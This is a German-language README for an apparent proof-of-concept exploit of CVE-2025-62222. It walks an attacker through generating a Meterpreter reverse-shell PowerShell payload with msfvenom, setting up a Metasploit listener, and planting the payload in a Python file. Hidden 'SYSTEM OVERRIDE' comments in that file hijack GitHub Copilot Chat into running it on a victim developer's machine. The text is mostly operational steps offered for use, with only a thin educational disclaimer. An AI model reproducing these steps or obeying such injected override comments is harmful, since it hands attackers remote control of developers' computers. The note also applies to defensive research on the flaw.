
Proof-of-concept-Exploit für CVE-2025-62222, das Remote-Code-Ausführung durch Prompt-Injection in GitHub Copilot Chat für VS Code demonstriert, mit Metasploit-Payload-Generierung und Reverse-Shell-Listener-Einrichtung.
Dieses Repository enthält einen Proof of Concept (PoC) für die Schwachstelle CVE-2025-62222. Es zeigt, wie eine Remote Code Execution (RCE) auf dem Rechner eines Entwicklers erreicht werden kann, indem der Kontext von GitHub Copilot Chat in VS Code durch versteckte Prompt-Injektion in Kommentaren manipuliert wird.
NUR ZU BILDUNGSZWECKEN.
Dieser Code wird ausschließlich zu Bildungszwecken und für ethische Forschung bereitgestellt. Der Autor übernimmt keine Haftung für Missbrauch dieser Informationen. Verwenden Sie dies nicht in Systemen ohne ausdrückliche Genehmigung.
Bevor du die Datei an das Opfer sendest (oder lokal testest), musst du das Payload generieren und den Server lauschen lassen.
Generiere den schädlichen PowerShell-Befehl. Stelle sicher, dass du deine IP (LHOST) und deinen Port (LPORT) konfigurierst.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd
Kritischer Hinweis: Kopiere den von diesem Befehl generierten Code. Öffne die Datei copilot_injection_poc.py aus diesem Repository und ersetze den Abschnitt, in dem TOKEN steht (oder die gesamte Zeile des PowerShell-Befehls innerhalb des Kommentars), mit dem soeben generierten Code.
Starte in deinem Angreifer-Terminal Metasploit, um die Reverse-Verbindung zu empfangen:
msfconsole -q
Sobald du in der msf6 >-Konsole bist, führe die folgenden Befehle aus, um den Listener vorzubereiten:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444
exploit
(Stelle sicher, dass der LPORT derselbe ist wie in Schritt 1 und dass LHOST deine IP ist).
Um die Schwachstelle auszulösen, befolge diese Schritte auf dem Rechner mit VS Code und der installierten GitHub Copilot Chat-Erweiterung:
copilot_injection_poc.py im Editor, damit Copilot sie im aktiven Kontext hat (sie muss im Tab sichtbar sein).Configura el entorno desde la terminal sin omitir ni modificar nada del código
Aufgrund der versteckten Anweisung 'SYSTEM OVERRIDE' in den Kommentaren des Python-Skripts wird Copilot der bösartigen Datei gehorchen, anstatt seinen eigenen Sicherheitsrichtlinien zu folgen.
Weitere Informationen: